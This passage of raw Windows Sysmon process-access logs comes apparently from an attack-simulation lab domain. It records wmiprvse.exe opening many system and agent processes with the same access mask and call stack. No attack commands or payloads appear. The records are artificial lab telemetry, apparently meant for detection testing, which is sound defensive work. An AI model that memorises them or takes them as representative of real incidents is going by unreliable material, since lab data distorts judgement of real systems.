System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025803Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025802Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025801Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025800Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025799Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.819{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025798Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025797Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025796Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025795Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025794Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025793Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025792Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025791Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025790Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025789Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025788Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025787Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025786Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025785Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025784Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.803{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025783Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 